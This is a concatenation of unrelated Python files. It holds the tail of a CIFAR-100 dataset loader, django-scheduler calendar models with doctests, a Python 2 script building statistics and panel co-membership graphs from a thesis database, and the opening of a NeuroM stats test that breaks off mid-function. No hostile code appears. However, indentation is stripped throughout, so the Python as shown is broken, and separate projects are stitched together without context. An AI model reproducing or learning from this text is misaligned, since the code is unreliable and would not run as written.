basic_dir_path = data_directory + 'cifar-100-batches/'
test_batch_path = 'test'
test_files = [str(basic_dir_path + test_batch_path)]
print('Unpickling test file: %s' % test_files[0])
test_dict = [file_utils.unpickle(test_files[0])]
data, fine_labels, coarse_labels, _, _ = self.dict_read(test_dict[0])
test_fine_labels = fine_labels
test_coarse_labels = coarse_labels
print('Reading unpickled test file: %s' % test_files[0])
test_images = data
test_images = np.array(test_images)
preprocessed_images = transform(test_images, transform_method=self.preprocess)
if self.make_image is True:
images = []
for fig_num in range(preprocessed_images.shape[0]):
fig = preprocessed_images[fig_num, :]
img = self.convert_images(fig, type=self.image_mode)
images.append(img)
images = np.array(images)
test_fine_labels = np.array(test_fine_labels)
test_coarse_labels = np.array(test_coarse_labels)
self.test.data = np.array(preprocessed_images[:self.num_test_images])
if self.make_image is True:
self.test.images = np.array(images[:self.num_test_images, :])
self.test.fine_labels = np.array(test_fine_labels[:self.num_test_images])
self.test.coarse_labels = np.array(test_coarse_labels[:self.num_test_images])
self.test.fine_class_names = np.array(list(map(lambda x: self.fine_classes[x], self.test.fine_labels)))
self.test.coarse_class_names = np.array(list(map(lambda x: self.coarse_classes[x], self.test.coarse_labels)))
if self.one_hot_encode is True:
self.convert_one_hot_encoding(self.test.fine_labels, data_type='test', class_type='fine')
self.convert_one_hot_encoding(self.test.coarse_labels, data_type='test', class_type='coarse')
if self.save_h5py != '':
h5f = h5py.File(self.save_h5py, 'a')
h5f.create_dataset('test_dataset', data=self.test.data, compression="gzip", compression_opts=9)
print('Written CIFAR 100 test dataset to file: %s' % self.save_h5py)
h5f.close()
del test_fine_labels
del test_coarse_labels
del test_images
del preprocessed_images
if self.make_image is True:
del images
print()
return True
def load_data(self, train=True, test=True, data_directory='/tmp/cifar100/'):
"""
:param train:
:param test:
:param data_directory:
:return:
"""
print('Loading CIFAR 100 Dataset')
start = time.time()
self.download_and_extract_data(data_directory)
if train is True:
print('Loading %d train images' %self.num_train_images)
if self.train_validate_split is not None:
print('Loading %d validate images' % self.num_validate_images)
self.load_train_data(data_directory=data_directory)
if test is True:
print('Loading %d test images' % self.num_test_images)
self.load_test_data(data_directory=data_directory)
end = time.time()
print('Loaded CIFAR 100 Dataset in %.4f seconds' %(end-start))
return True
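# --- Usage sketch (illustrative; not part of the library) ---
# One way to exercise the loader above; the fractions, split value and data
# directory are assumptions chosen for the example, not recommended defaults.
if __name__ == '__main__':
    cifar = CIFAR100(num_images=0.1, num_test_images=0.1, one_hot_encode=True,
                     train_validate_split=0.9, make_image=False, verbose=True)
    cifar.load_data(train=True, test=True, data_directory='/tmp/cifar100/')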
|
|
from django.contrib.contenttypes import fields
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import Q
from django.template.defaultfilters import slugify
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from schedule.settings import USE_FULLCALENDAR
from schedule.utils import EventListManager
class CalendarManager(models.Manager):
"""
>>> user1 = User(username='tony')
>>> user1.save()
"""
def get_calendar_for_object(self, obj, distinction=""):
"""
This function gets a calendar for an object. It should only return one
calendar. If the object has more than one calendar related to it (or
more than one related to it under a distinction if a distinction is
defined) an AssertionError will be raised. If none are returned it will
raise Calendar.DoesNotExist.
>>> user = User.objects.get(username='tony')
>>> try:
... Calendar.objects.get_calendar_for_object(user)
... except Calendar.DoesNotExist:
... print("failed")
...
failed
Now if we add a calendar it should return the calendar
>>> calendar = Calendar(name='My Cal')
>>> calendar.save()
>>> calendar.create_relation(user)
>>> Calendar.objects.get_calendar_for_object(user)
<Calendar: My Cal>
Now if we add one more calendar it should raise an AssertionError
because there is more than one related to it.
If you would like to get more than one calendar for an object you should
use get_calendars_for_object (see below).
>>> calendar = Calendar(name='My 2nd Cal')
>>> calendar.save()
>>> calendar.create_relation(user)
>>> try:
... Calendar.objects.get_calendar_for_object(user)
... except AssertionError:
... print("failed")
...
failed
"""
calendar_list = self.get_calendars_for_object(obj, distinction)
if len(calendar_list) == 0:
raise Calendar.DoesNotExist("Calendar does not exist.")
elif len(calendar_list) > 1:
raise AssertionError("More than one calendar was found.")
else:
return calendar_list[0]
def get_or_create_calendar_for_object(self, obj, distinction="", name=None):
"""
>>> user = User(username="jeremy")
>>> user.save()
>>> calendar = Calendar.objects.get_or_create_calendar_for_object(user, name = "Jeremy's Calendar")
>>> calendar.name
"Jeremy's Calendar"
"""
try:
return self.get_calendar_for_object(obj, distinction)
except Calendar.DoesNotExist:
if name is None:
calendar = self.model(name=str(obj))
else:
calendar = self.model(name=name)
calendar.slug = slugify(calendar.name)
calendar.save()
calendar.create_relation(obj, distinction)
return calendar
def get_calendars_for_object(self, obj, distinction=""):
"""
This function allows you to get calendars for a specific object
If distinction is set, it will filter out any relation that doesn't have
that distinction.
"""
ct = ContentType.objects.get_for_model(obj)
if distinction:
dist_q = Q(calendarrelation__distinction=distinction)
else:
dist_q = Q()
return self.filter(
dist_q,
calendarrelation__content_type=ct,
calendarrelation__object_id=obj.id,
)
class Calendar(models.Model):
"""
This is for grouping events so that batch relations can be made to all
events. An example would be a project calendar.
name: the name of the calendar
events: all the events contained within the calendar.
>>> calendar = Calendar(name = 'Test Calendar')
>>> calendar.save()
>>> data = {
... 'title': 'Recent Event',
... 'start': datetime.datetime(2008, 1, 5, 0, 0),
... 'end': datetime.datetime(2008, 1, 10, 0, 0)
... }
>>> event = Event(**data)
>>> event.save()
>>> calendar.events.add(event)
>>> data = {
... 'title': 'Upcoming Event',
... 'start': datetime.datetime(2008, 1, 1, 0, 0),
... 'end': datetime.datetime(2008, 1, 4, 0, 0)
... }
>>> event = Event(**data)
>>> event.save()
>>> calendar.events.add(event)
>>> data = {
... 'title': 'Current Event',
... 'start': datetime.datetime(2008, 1, 3),
... 'end': datetime.datetime(2008, 1, 6)
... }
>>> event = Event(**data)
>>> event.save()
>>> calendar.events.add(event)
"""
name = models.CharField(_("name"), max_length=200)
slug = models.SlugField(_("slug"), max_length=200, unique=True)
objects = CalendarManager()
class Meta:
verbose_name = _("calendar")
verbose_name_plural = _("calendars")
def __str__(self):
return self.name
@property
def events(self):
return self.event_set
def create_relation(self, obj, distinction="", inheritable=True):
"""
Creates a CalendarRelation between self and obj.
if Inheritable is set to true this relation will cascade to all events
related to this calendar.
"""
CalendarRelation.objects.create_relation(self, obj, distinction, inheritable)
def get_recent(self, amount=5):
"""
This shortcut function allows you to get events that have started
recently.
amount is the amount of events you want in the queryset. The default is
5.
"""
return self.events.order_by("-start").filter(start__lt=timezone.now())[:amount]
def occurrences_after(self, date=None):
return EventListManager(self.events.all()).occurrences_after(date)
def get_absolute_url(self):
if USE_FULLCALENDAR:
return reverse("fullcalendar", kwargs={"calendar_slug": self.slug})
return reverse("calendar_home", kwargs={"calendar_slug": self.slug})
class CalendarRelationManager(models.Manager):
def create_relation(
self, calendar, content_object, distinction="", inheritable=True
):
"""
Creates a relation between calendar and content_object.
See CalendarRelation for help on distinction and inheritable
"""
return CalendarRelation.objects.create(
calendar=calendar, distinction=distinction, content_object=content_object,
inheritable=inheritable
)
class CalendarRelation(models.Model):
"""
This is for relating data to a Calendar, and possibly to all of the events for
that calendar. There is also a distinction, so that the same type or kind of
data can be related in different ways. A good example: if you have
calendars that are only visible to certain users, you could create a
relation between calendars and users, with the distinction of 'visibility'
or 'ownership'. If inheritable is set to true, all the events for this
calendar will inherit this relation.
calendar: a foreign key relation to a Calendar object.
content_type: a foreign key relation to the ContentType of the generic object
object_id: the id of the generic object
content_object: the generic foreign key to the generic object
distinction: a string representing a distinction of the relation; a User could
have a 'viewer' relation and an 'owner' relation, for example.
inheritable: a boolean that decides if events of the calendar should also
inherit this relation
DISCLAIMER: while this model is a nice out-of-the-box feature to have, it
may not scale well. If you use this, keep that in mind.
"""
calendar = models.ForeignKey(
Calendar, on_delete=models.CASCADE, verbose_name=_("calendar")
)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.IntegerField(db_index=True)
content_object = fields.GenericForeignKey("content_type", "object_id")
distinction = models.CharField(_("distinction"), max_length=20)
inheritable = models.BooleanField(_("inheritable"), default=True)
objects = CalendarRelationManager()
class Meta:
verbose_name = _("calendar relation")
verbose_name_plural = _("calendar relations")
index_together = [("content_type", "object_id")]
def __str__(self):
return "{} - {}".format(self.calendar, self.content_object)
|
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 18 11:20:55 2014
@author: aitor
"""
import mysql.connector
from cache import university_locations, university_ids, thesis_ids, name_genders, codes_descriptor, descriptor_codes
import networkx as nx
import sys
import pprint
import json
import os
lib_path = os.path.abspath('../')
sys.path.append(lib_path)
from model.dbconnection import dbconfig
config = dbconfig
#*******************
# SNA
#*******************
def build_panel_relations():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
G = nx.Graph()
for cont, thesis in enumerate(thesis_ids):
if cont%500 == 0:
print 'Creating panel relations network: ' + str(float(cont)/len(thesis_ids) * 100)
query = 'SELECT person.name FROM panel_member, person WHERE panel_member.person_id = person.id AND panel_member.thesis_id =' + str(thesis)
cursor.execute(query)
panel = []
for person in cursor:
panel.append(person[0])
for i, person in enumerate(panel):
source = person
for j in range(i+1, len(panel)):
target = panel[j]
if G.has_edge(source, target):
G.edge[source][target]['weight'] += 1
else:
G.add_edge(source, target, weight = 1)
cursor.close()
print 'Graph created'
print '-Nodes:',len(G.nodes())
print '-Edges:',len(G.edges())
return G
def build_area_relations():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
g_3 = nx.Graph()
g_2 = nx.Graph()
g_1 = nx.Graph()
for cont, thesis in enumerate(thesis_ids):
if cont%500 == 0:
print 'Creating area relations network: ' + str(float(cont)/len(thesis_ids) * 100)
query = 'SELECT descriptor.code FROM descriptor, association_thesis_description WHERE association_thesis_description.descriptor_id = descriptor.id AND association_thesis_description.thesis_id =' + str(thesis)
cursor.execute(query)
descriptors = []
for descriptor in cursor:
descriptors.append(str(descriptor[0]))
for i, descriptor in enumerate(descriptors):
source_3 = codes_descriptor[descriptor]
source_2 = codes_descriptor[descriptor[:4] +'00']
source_1 = codes_descriptor[descriptor[:2] + '0000']
for j in range(i+1, len(descriptors)):
target_3 = codes_descriptor[descriptors[j]]
target_2 = codes_descriptor[descriptors[j][:4] + '00']
target_1 = codes_descriptor[descriptors[j][:2] + '0000']
if g_3.has_edge(source_3, target_3):
g_3.edge[source_3][target_3]['weight'] += 1
else:
g_3.add_edge(source_3, target_3, weight = 1)
if g_2.has_edge(source_2, target_2):
g_2.edge[source_2][target_2]['weight'] += 1
else:
g_2.add_edge(source_2, target_2, weight = 1)
if g_1.has_edge(source_1, target_1):
g_1.edge[source_1][target_1]['weight'] += 1
else:
g_1.add_edge(source_1, target_1, weight = 1)
cursor.close()
print 'Third level'
print '-Nodes:',len(g_3.nodes())
print '-Edges:',len(g_3.edges())
print 'Second level'
print '-Nodes:',len(g_2.nodes())
print '-Edges:',len(g_2.edges())
print 'First level'
print '-Nodes:',len(g_1.nodes())
print '-Edges:',len(g_1.edges())
return g_3, g_2, g_1
# The graph is too big, so nodes with too low a degree are deleted.
# If a node has a degree of 4 or less, it has only sat on the panel of 1 viva.
def filter_panel_relations(G, MIN_DEGREE = 5):
print 'Starting graph'
print '-Nodes:',len(G.nodes())
print '-Edges:',len(G.edges())
continue_cleaning = True
while(continue_cleaning):
degrees = G.degree()
total_removed = 0
for d in degrees:
if degrees[d] < MIN_DEGREE:
G.remove_node(d)
total_removed += 1
if total_removed == 0:
continue_cleaning = False
else:
print 'Deleted:', total_removed
print 'Filtered graph'
print '-Nodes:',len(G.nodes())
print '-Edges:',len(G.edges())
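# --- Pipeline sketch (illustrative; not part of the original script) ---
# A typical way to combine the helpers above; exporting the filtered graph to
# GEXF with networkx is an assumption for the example, not something this
# script does here.
def _example_panel_pipeline():
    g = build_panel_relations()
    filter_panel_relations(g, MIN_DEGREE=5)
    nx.write_gexf(g, 'panel_relations.gexf')
    return g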
#***********************
# Simple statistics
#***********************
def get_university_ids():
cnx = mysql.connector.connect(**config)
cursor_unis = cnx.cursor()
cursor_unis.execute("SELECT id, name FROM university")
result = {}
for university in cursor_unis:
result[university[0]] = university[1]
cursor_unis.close()
return result
def get_number_phd_by_universities():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
result = {}
for key in university_ids.keys():
uni_name = university_ids[key]
query = 'SELECT COUNT(*) FROM thesis WHERE university_id=' + str(key)
cursor.execute(query)
for count in cursor:
result[uni_name] = count[0]
cursor.close()
return result
def create_university_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT university_id, defense_date from thesis'
cursor.execute(query)
results = {2000:{u'DEUSTO':0}}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Universities temporal evolution', i
try:
university = university_ids[thesis[0]]
year = thesis[1].year
if year in results.keys():
unis = results[year]
if university in unis.keys():
unis[university] += 1
else:
unis[university] = 1
else:
results[year] = {university:1}
except AttributeError:
print 'The thesis has no year in the database'
except KeyError:
print 'Unknown university:', thesis[0]
except TypeError:
print 'The thesis has no related university'
cursor.close()
return results
def create_region_temporal_evolution_by_year():
by_university = create_university_temporal_evolution_by_year()
by_region = {}
for year in by_university:
universities = by_university[year]
for uni in universities:
region = university_locations[uni]
total_uni = universities[uni]
if year in by_region.keys():
regions = by_region[year]
if region in regions.keys():
regions[region] += total_uni
else:
regions[region] = total_uni
else:
by_region[year] = {region:total_uni}
return by_region
def create_area_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT id, defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
try:
thesis_id = thesis[0]
year = thesis[1].year
if i%500 == 0:
print 'Unesco code temporal evolution, processing', thesis_id, ', year', year
#get descriptors
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = []
for desc in cursor_desc:
used_descriptors.append(desc[0])
cursor_desc.close()
if year in results.keys():
descs = results[year]
for descriptor_id in used_descriptors:
descriptor_text = codes_descriptor[str(descriptor_id)]
if descriptor_text in descs.keys():
descs[descriptor_text] += 1
else:
descs[descriptor_text] = 1
else:
descs = {}
for descriptor_id in used_descriptors:
descriptor_text = codes_descriptor[str(descriptor_id)]
descs[descriptor_text] = 1
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
#only uses first level area codes ##0000
def create_meta_area_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT id, defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
try:
thesis_id = thesis[0]
year = thesis[1].year
if i%500 == 0:
print 'First level Unesco code temporal evolution, processing', thesis_id, ', year', year
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = set()
for desc in cursor_desc:
try:
descriptor_text = codes_descriptor[str(desc[0])]
descriptor_code = descriptor_codes[descriptor_text]
first_level_code = descriptor_code[0:2] + '0000'
first_level_descriptor = codes_descriptor[first_level_code]
used_descriptors.add(first_level_descriptor)
except:
                    print 'No data for descriptor code', desc[0]  # desc[0] is always bound here, unlike descriptor_text
cursor_desc.close()
if year in results.keys():
descs = results[year]
for d in used_descriptors:
if d in descs.keys():
descs[d] += 1
else:
descs[d] = 1
else:
descs = {}
for d in used_descriptors:
descs[d] = 1
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
def create_gender_temporal_evolution_by_year():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT person.first_name, thesis.author_id, thesis.defense_date FROM thesis, person WHERE thesis.author_id = person.id'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Genders temporal evolution', i
try:
name = thesis[0].split(' ')[0] #if it is a composed name we use only the first part to identify the gender
try:
gender = name_genders[name]
except KeyError:
gender = 'None'
year = thesis[2].year
if year in results.keys():
genders = results[year]
if gender in genders.keys():
genders[gender] += 1
else:
genders[gender] = 1
else:
results[year] = {gender:1}
except AttributeError:
print 'The thesis has no year in the database'
cursor.close()
return results
def create_gender_percentaje_evolution(gender_temp):
result= {}
for year in gender_temp:
try:
total_year = float(gender_temp[year]['female'] + gender_temp[year]['male'])
female_perc = gender_temp[year]['female']/total_year
male_perc = gender_temp[year]['male']/total_year
result[year] = {'female':female_perc, 'male':male_perc}
except:
pass
return result
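# A hedged sketch of the shapes involved (the numbers below are hypothetical,
# not taken from the database): given gender_temp such as
#
#   {2005: {'male': 120, 'female': 80, 'None': 5}}
#
# the function returns the per-year fractions of the identified genders only:
#
#   {2005: {'female': 0.4, 'male': 0.6}}
#
# Years missing either the 'male' or the 'female' key are silently dropped by
# the bare except above.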
def create_gender_per_area_evolution():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT person.first_name, thesis.id, thesis.defense_date FROM thesis, person WHERE thesis.author_id = person.id'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Genders per Unesco code temporal evolution', i
try:
#get gender
name = thesis[0].split(' ')[0] #if it is a composed name we use only the first part to identify the gender
try:
gender = name_genders[name]
except KeyError:
gender = 'None'
#get descriptors
thesis_id = thesis[1]
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = []
for desc in cursor_desc:
used_descriptors.append(desc[0])
cursor_desc.close()
year = thesis[2].year
if year in results.keys():
descs = results[year]
for descriptor_id in used_descriptors:
decriptor_text = codes_descriptor[str(descriptor_id)]
if decriptor_text in descs.keys():
gender_area = descs[decriptor_text]
if gender in gender_area.keys():
gender_area[gender] += 1
else:
gender_area[gender] = 1
else:
descs[decriptor_text] = {gender:1}
else:
descs = {}
for descriptor_id in used_descriptors:
decriptor_text = codes_descriptor[str(descriptor_id)]
descs[decriptor_text] = {gender:1}
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
def create_gender_panel_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT thesis.id, thesis.defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Thesis panel gender distribution temporal evolution', i
cursor_names = cnx2.cursor()
query_names = 'SELECT person.first_name FROM panel_member, person WHERE person.id = panel_member.person_id AND panel_member.thesis_id=' + str(thesis[0])
cursor_names.execute(query_names)
genders = {'male':0, 'female':0, 'None':0}
for name in cursor_names:
try:
gender = name_genders[name[0]]
except:
gender = 'None'
genders[gender] += 1
cursor_names.close()
try:
year = thesis[1].year
if year in results.keys():
gender_cont = results[year]
for g in genders:
if g in gender_cont.keys():
gender_cont[g] += genders[g]
else:
gender_cont[g] = genders[g]
else:
results[year] = genders
except AttributeError:
print 'The thesis has no year in the database'
cursor.close()
return results
def create_gender_advisor_evolution_by_year():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT thesis.id, thesis.defense_date from thesis'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Thesis advisor gender distribution temporal evolution', i
cursor_names = cnx2.cursor()
query_names = 'SELECT person.first_name FROM advisor, person WHERE person.id = advisor.person_id AND advisor.thesis_id=' + str(thesis[0])
cursor_names.execute(query_names)
genders = {'male':0, 'female':0, 'None':0}
for name in cursor_names:
try:
gender = name_genders[name[0]]
except:
gender = 'None'
genders[gender] += 1
cursor_names.close()
try:
year = thesis[1].year
if year in results.keys():
gender_cont = results[year]
for g in genders:
if g in gender_cont.keys():
gender_cont[g] += genders[g]
else:
gender_cont[g] = genders[g]
else:
results[year] = genders
except AttributeError:
print 'The thesis has no year in the database'
cursor.close()
return results
def create_gender_meta_area_evolution():
cnx = mysql.connector.connect(**config)
cnx2 = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT person.first_name, thesis.id, thesis.defense_date FROM thesis, person WHERE thesis.author_id = person.id'
cursor.execute(query)
results = {}
for i, thesis in enumerate(cursor):
if i%500 == 0:
print 'Genders per first level Unesco code temporal evolution', i
try:
#get gender
name = thesis[0].split(' ')[0] #if it is a composed name we use only the first part to identify the gender
try:
gender = name_genders[name]
except KeyError:
gender = 'None'
#get descriptors
thesis_id = thesis[1]
cursor_desc = cnx2.cursor()
query_desc = 'SELECT descriptor.code FROM association_thesis_description, descriptor WHERE association_thesis_description.thesis_id=' + str(thesis_id) + ' AND association_thesis_description.descriptor_id=descriptor.id'
cursor_desc.execute(query_desc)
used_descriptors = set()
for desc in cursor_desc:
try:
descriptor_text = codes_descriptor[str(desc[0])]
descriptor_code = descriptor_codes[descriptor_text]
first_level_code = descriptor_code[0:2] + '0000'
first_level_descriptor = codes_descriptor[first_level_code]
used_descriptors.add(first_level_descriptor)
except TypeError:
print 'Thesis has no unesco codes'
cursor_desc.close()
year = thesis[2].year
if year in results.keys():
descs = results[year]
for decriptor_text in used_descriptors:
if decriptor_text in descs.keys():
gender_area = descs[decriptor_text]
if gender in gender_area.keys():
gender_area[gender] += 1
else:
gender_area[gender] = 1
else:
descs[decriptor_text] = {gender:1}
else:
descs = {}
for decriptor_text in used_descriptors:
descs[decriptor_text] = {gender:1}
results[year] = descs
except AttributeError:
print 'The thesis has no year in the database'
except mysql.connector.errors.InternalError as ie:
print 'Mysql error', ie.msg
cursor.close()
return results
def create_month_distribution():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = 'SELECT thesis.defense_date FROM thesis'
cursor.execute(query)
results = {}
for i, date in enumerate(cursor):
if i%500 == 0:
print 'Month distribution', i
try:
month = date[0].month
        except AttributeError:
            # Skip records without a defense date so a stale month is not reused
            print 'Thesis has no date'
            continue
if month in results.keys():
results[month] += 1
else:
results[month] = 1
cursor.close()
return results
def create_university_areas():
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
query = '''SELECT thesis.defense_date, university.name, descriptor.code
FROM thesis, university, descriptor, association_thesis_description
WHERE thesis.id = association_thesis_description.thesis_id
AND association_thesis_description.descriptor_id = descriptor.id
AND thesis.university_id = university.id'''
cursor.execute(query)
results_by_uni = {} #{DEUSTO:{'2000':{'INFORMATICA':1}}}
results_by_code = {} #{INFORMATICA:{'2000':{'DEUSTO':1}}}
for i, info in enumerate(cursor):
if i%500 == 0:
print 'University areas', i
try:
year = info[0].year
university = info[1]
code = str(info[2])[:4] + '00'
code = codes_descriptor[code]
        except AttributeError:
            # Skip records without a defense date so stale values are not reused
            print 'Thesis has no date'
            continue
if university in results_by_uni.keys():
years = results_by_uni[university]
if year in years.keys():
codes = years[year]
if code in codes.keys():
codes[code] += 1
else:
codes[code] = 1
else:
years[year] = {code:1}
else:
results_by_uni[university] = {year:{code:1}}
if code in results_by_code.keys():
years = results_by_code[code]
if year in years.keys():
universities = years[year]
if university in universities.keys():
universities[university] += 1
else:
universities[university] = 1
else:
years[year] = {university:1}
else:
results_by_code[code] = {year:{university:1}}
cursor.close()
return results_by_uni, results_by_code
if __name__=='__main__':
print 'Calculating statistics and graphs'
pp = pprint.PrettyPrinter(indent=4)
# #create the thesis panel social network
# G = build_panel_relations()
# filter_panel_relations(G)
# print 'Writing file'
# nx.write_gexf(G, '../website/static/data/panel_relations_filtered.gexf')
#
# #create the social network for the thematic areas
# g_3, g_2, g_1 = build_area_relations()
# print 'Writing files'
# nx.write_gexf(g_3, '../website/static/data/3_level_unesco_relations.gexf')
# nx.write_gexf(g_2, '../website/static/data/2_level_unesco_relations.gexf')
# nx.write_gexf(g_1, '../website/static/data/1_level_unesco_relations.gexf')
# #Create the temporal evolution of the universities
# print 'Temporal evolution of the universities'
# unis = create_university_temporal_evolution_by_year()
# pp.pprint(unis)
# json.dump(unis, open('../website/static/data/universities_temporal.json', 'w'), indent = 4)
#
    # #Create the temporal evolution of the geographical regions
    # print 'Temporal evolution of the geographical regions'
# regions = create_region_temporal_evolution_by_year()
# pp.pprint(regions)
# json.dump(regions, open('../website/static/data/regions_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the knowledge areas
# print 'Temporal evolution of the knowledge areas'
# areas = create_area_temporal_evolution_by_year()
# pp.pprint(areas)
# json.dump(areas, open('../website/static/data/areas_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the author genders
# print 'Temporal evolution of the author genders'
# genders_total = create_gender_temporal_evolution_by_year()
# pp.pprint(genders_total)
# json.dump(genders_total, open('../website/static/data/genders_total.json', 'w'), indent = 4)
#
# #Create the temporal evolution of gender percentage
# print 'Temporal evolution of gender percentage'
# genders_percentage = create_gender_percentaje_evolution(genders_total)
# pp.pprint(genders_percentage)
# json.dump(genders_percentage, open('../website/static/data/genders_percentage.json', 'w'), indent = 4)
#
# #create the temporal evolution of gender per area
# print 'Temporal evolution of gender percentage per area'
# genders_area_total = create_gender_per_area_evolution()
# pp.pprint(genders_area_total)
# json.dump(genders_area_total, open('../website/static/data/genders_area_total.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the primary knowledge areas
# print 'Temporal evolution of the knowledge areas'
# primary_areas = create_meta_area_temporal_evolution_by_year()
# pp.pprint(primary_areas)
# json.dump(primary_areas, open('../website/static/data/first_level_areas_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of panel members' gender
# print 'Temporal evolution of the panel members\' gender areas'
# panel_gender = create_gender_panel_evolution_by_year()
# pp.pprint(panel_gender)
# json.dump(panel_gender, open('../website/static/data/gender_panel_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the genders in first level areas
# print 'Temporal evolution of the student genders by first level area'
# meta_area_gender = create_gender_meta_area_evolution()
# pp.pprint(meta_area_gender)
# json.dump(meta_area_gender, open('../website/static/data/gender_first_level_areas_temporal.json', 'w'), indent = 4)
#
# #Create the temporal evolution of the genders of the thesis advisors
# print 'Temporal evolution of the advisors genders'
# advisor_gender = create_gender_advisor_evolution_by_year()
# pp.pprint(advisor_gender)
# json.dump(advisor_gender, open('../website/static/data/advisor_gender.json', 'w'), indent = 4)
#
# #create month distribution
# print 'Month distribution'
# month_distribution = create_month_distribution()
# pp.pprint(month_distribution)
# json.dump(month_distribution, open('../website/static/data/month_distribution.json', 'w'), indent = 4)
#
#create second level area temporal evolution per university and year
print 'Area temporal evolution per university and year'
results_by_uni, results_by_code = create_university_areas()
pp.pprint(results_by_uni)
json.dump(results_by_uni, open('../website/static/data/university_area_year_by_uni.json', 'w'), indent = 4)
pp.pprint(results_by_code)
json.dump(results_by_code, open('../website/static/data/university_area_year_by_code.json', 'w'), indent = 4)
print '********** DONE *************'
|
|
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Test neurom.stats
Since the stats module consists of simple wrappers to scipy.stats functions,
these tests are only sanity checks.
'''
from neurom import stats as st
from nose import tools as nt
import numpy as np
import random
np.random.seed(42)
NORMAL_MU = 10.
NORMAL_SIGMA = 1.0
NORMAL = np.random.normal(NORMAL_MU, NORMAL_SIGMA, 1000)
EXPON_LAMBDA = 10.
EXPON = np.random.exponential(EXPON_LAMBDA, 1000)
UNIFORM_MIN = -1.
UNIFORM_MAX = 1.
UNIFORM = np.random.uniform(UNIFORM_MIN, UNIFORM_MAX, 1000)
def test_fit_normal_params():
fit_ = st.fit(NORMAL, 'norm')
